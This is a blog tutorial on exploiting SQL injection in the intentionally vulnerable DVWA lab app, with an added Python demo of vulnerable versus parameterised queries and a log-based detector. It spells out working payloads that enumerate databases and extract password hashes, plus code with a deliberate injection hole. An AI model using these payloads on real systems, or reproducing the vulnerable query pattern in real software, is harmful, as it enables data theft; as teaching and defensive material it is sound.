
    Sunday, January 28, 2024

    Learning Web Pentesting With DVWA Part 2: SQL Injection

    In the last article, Learning Web Pentesting With DVWA Part 1: Installation, you were given a glimpse of SQL injection when we installed the DVWA app. In this article we explain what we did at the end of that article, and much more.
    Let's start by defining what SQL injection is. OWASP defines it as: "A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
    In plain terms, this means that a single vulnerable input field in a web application can be used to read information from the database behind it, and at times to control that database or even the server hosting it.
    In this article we are going to perform a SQL injection attack on DVWA, so let's jump in. On the DVWA welcome page, click the SQL Injection navigation link. We are presented with a page with an input field for User ID.
    Now let's try entering a value such as 1 in the input field. The server responds with the first name and surname of the user associated with User ID 1.
    If we enter a user ID that doesn't exist, we get no data back from the server. To determine whether an input field is vulnerable to SQL injection, we start by sending a single quote (') as input, which returns an SQL error.
    We saw this in the previous article, where we also talked about the injection point. Before diving deeper into how this vulnerability can be exploited, let's try to understand how this error might have occurred by reconstructing the SQL query the server is probably trying to execute. Say the query looks something like this:
    SELECT first_name, sur_name FROM users WHERE user_id = '1';
    The 1 in this query is the value supplied by the user in the User ID input field. When we input a single quote instead, the query becomes:
    SELECT first_name, sur_name FROM users WHERE user_id = ''';
    The quotes around the input are added by the server-side application code, so the error is due to the extra, unmatched single quote in the query. Now, if we add a comment after the single quote, like this:
    '-- -
    or
    '#
    we should get no error. Our crafted query now looks like this:
    SELECT first_name, sur_name FROM users WHERE user_id = ''-- -';
    or
    SELECT first_name, sur_name FROM users WHERE user_id = ''#';
    Since everything after # or -- - is commented out, the query ignores the extra single quote added by the server-side app and whatever follows it, and no error is generated. The query returns nothing, however, because we specified an empty string ('') as the user_id.
    Now that we know how things might be working on the server side, we can start attacking the application.
    First of all, we will determine the number of columns the original query outputs: if our injected query outputs more or fewer columns than the original, it returns an error. We find the exact count with the help of the ORDER BY statement, like this:
    ' order by 1-- -
    The MySQL server might execute the query as:
    SELECT first_name, sur_name FROM users WHERE user_id = '' order by 1-- -';
    You get the idea now.
    If we don't get an error message, we increase the number to 2, like this:
    ' order by 2-- -
    Still no error message, so let's increase it once more:
    ' order by 3-- -
    And there we go, we have an error message. This tells us that the server query selects 2 columns, because it errored out at 3.
    Now let's use the UNION SELECT statement to get information about the database itself.
    ' union select null, version()-- - 
    You should first understand what a UNION SELECT statement does; only then can you understand what we are doing here. You can read about it in reference 2 below.
    We used null for one column because we need to match the two columns of the server query. null acts as a dummy column that gives no output, while the second column, in our case the version() function, outputs the database version. Notice the output from the application: nothing is shown for First name since we specified null for it, and the MariaDB version is displayed in Surname.
    Now let's check who the database user is, using MariaDB's user() function:
    ' union select null, user()-- -
    After clicking the submit button, you should see the database user in Surname.

    Now let's get some information about the databases on the server.
    Let's determine the names of the databases from INFORMATION_SCHEMA.SCHEMATA by entering the following input in the User ID field:
    ' union select null, SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA-- -
    This lists two databases: dvwa and information_schema. information_schema is the built-in database. Let's look at the dvwa database.
    Get the table names for the dvwa database from INFORMATION_SCHEMA.TABLES:
    ' union select null, TABLE_NAME from INFORMATION_SCHEMA.TABLES-- -
    It gives a long list of tables present in the dvwa database. What we are really interested in is the users table, since it is most likely to contain user passwords. First we need to determine the columns of that table, which we do by querying INFORMATION_SCHEMA.COLUMNS like this:
    ' union select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'-- - 

    We can see the password column in the output. Now let's get those passwords:
    ' union select user, password from users-- -
    Of course, those are password hashes, not plaintext passwords; you would still need to crack them.
    Hope you learned something about SQL injection in this article. See you next time.
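To make the mechanics above concrete, here is an added example (not code from the original post or from DVWA) that reproduces the server-side query the article infers against a small in-memory SQLite database, and runs every input from this walk-through through both the vulnerable string-built query and a parameterised version. The table and its rows are constructed sample data; the column names follow the article's reconstructed query, with placeholder strings in place of real hashes. Two differences from the MariaDB setup are assumed: SQLite has no `#` comment, so only the `-- -` form is exercised, and MariaDB's `version()` is replaced by SQLite's `sqlite_version()`.

```python
import sqlite3

# Constructed sample data standing in for DVWA's users table. Column names
# follow the query the article reconstructs (first_name, sur_name) plus the
# user/password columns read by the final payload. Hashes are placeholders.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "<constructed-hash-1>"),
    (2, "Gordon", "Brown", "gordonb", "<constructed-hash-2>"),
]


def make_db():
    """In-memory SQLite database with a users table like the one the article targets."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "sur_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the server-side code the article infers: the raw input is pasted
    between quotes, so a quote, a comment or a UNION in it becomes part of the SQL."""
    query = f"SELECT first_name, sur_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Hardened version: the value is bound as a parameter, so it is only ever data.
    An integer allowlist check on user_id would be a sensible second layer."""
    query = "SELECT first_name, sur_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def probe(conn, lookup, user_id):
    """Run one input through a lookup and report ('ok', rows) or ('error', message),
    which is the same signal the article reads off the DVWA page."""
    try:
        return ("ok", lookup(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# The article's inputs, adapted for SQLite (sqlite_version() instead of version(),
# and only the '-- -' comment form because SQLite has no '#' comment).
ARTICLE_INPUTS = [
    "1",
    "'",
    "'-- -",
    "' order by 2-- -",
    "' order by 3-- -",
    "' union select null, sqlite_version()-- -",
    "' union select user, password from users-- -",
]


def walk_through(lookup):
    """Return {input: (status, result)} for every article input against one lookup."""
    conn = make_db()
    return {value: probe(conn, lookup, value) for value in ARTICLE_INPUTS}


if __name__ == "__main__":
    for name, lookup in (("vulnerable", lookup_vulnerable), ("parameterised", lookup_safe)):
        print(f"== {name} ==")
        for value, (status, result) in walk_through(lookup).items():
            print(f"{value!r:50} -> {status}: {result}")
```

Running it shows the pattern the article relies on: against the vulnerable lookup, the lone quote and `order by 3` produce errors while `order by 2` and the UNION inputs succeed, whereas the parameterised lookup returns the admin row for `1` and an empty result, with no error, for every other input. The fix is not filtering quotes or comment sequences but keeping the value out of the query text entirely.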
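Seen from the defender's side, the probing sequence in this article (a lone quote, comment sequences, ORDER BY counting, UNION SELECT, INFORMATION_SCHEMA lookups) leaves a recognisable trail in web server access logs. The following added example, not part of the original post, scans constructed Apache-style log lines for those indicators in a query parameter. The log lines, the `/app/lookup` path and the `id` parameter name are all assumptions made for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Indicator patterns drawn from the inputs used in this walk-through.
INDICATORS = [
    ("sql-comment", re.compile(r"--|#")),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.IGNORECASE)),
    ("information-schema", re.compile(r"\binformation_schema\b", re.IGNORECASE)),
]

# Pulls the request target out of an Apache combined-format log line.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_value(value):
    """Return the sorted list of indicator names that fire on one decoded parameter value."""
    reasons = [name for name, pattern in INDICATORS if pattern.search(value)]
    # An odd number of single quotes is the signature of the article's first probe.
    if value.count("'") % 2 == 1:
        reasons.append("unbalanced-quote")
    return sorted(reasons)


def analyze_log(lines, param="id"):
    """Scan access-log lines for one query parameter and report values that look like SQL probing."""
    findings = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, recovering the raw input.
        query = parse_qs(urlparse(match.group(1)).query)
        for value in query.get(param, []):
            reasons = classify_value(value)
            if reasons:
                findings.append((value, reasons))
    return findings


# Constructed log lines (Apache combined format, placeholder path). The id values
# are URL-encoded forms of the inputs used earlier in this article.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jan/2024:10:00:01 +0000] "GET /app/lookup?id=1&Submit=Submit HTTP/1.1" 200 512',
    '10.0.0.5 - - [28/Jan/2024:10:00:07 +0000] "GET /app/lookup?id=%27&Submit=Submit HTTP/1.1" 500 312',
    '10.0.0.5 - - [28/Jan/2024:10:00:12 +0000] "GET /app/lookup?id=%27+order+by+3--+-&Submit=Submit HTTP/1.1" 500 312',
    '10.0.0.5 - - [28/Jan/2024:10:00:20 +0000] "GET /app/lookup?id=%27+union+select+null%2C+SCHEMA_NAME+from+INFORMATION_SCHEMA.SCHEMATA--+-&Submit=Submit HTTP/1.1" 200 640',
    '10.0.0.9 - - [28/Jan/2024:10:01:00 +0000] "GET /app/lookup?id=2&Submit=Submit HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for value, reasons in analyze_log(SAMPLE_LOG):
        print(f"{value!r}: {', '.join(reasons)}")
```

This is a triage heuristic, not a blocking filter: a legitimate value such as O'Brien trips the unbalanced-quote check, and an attacker who varies encoding or casing can dodge simple patterns. Its value is in surfacing the short burst of error responses followed by successful UNION requests from one client, which is exactly the shape of the session walked through above.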

    References:

    1. SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
    2. MySQL UNION: https://www.mysqltutorial.org/sql-union-mysql.aspx
    3. Chapter 25 INFORMATION_SCHEMA Tables: https://dev.mysql.com/doc/refman/8.0/en/information-schema.html
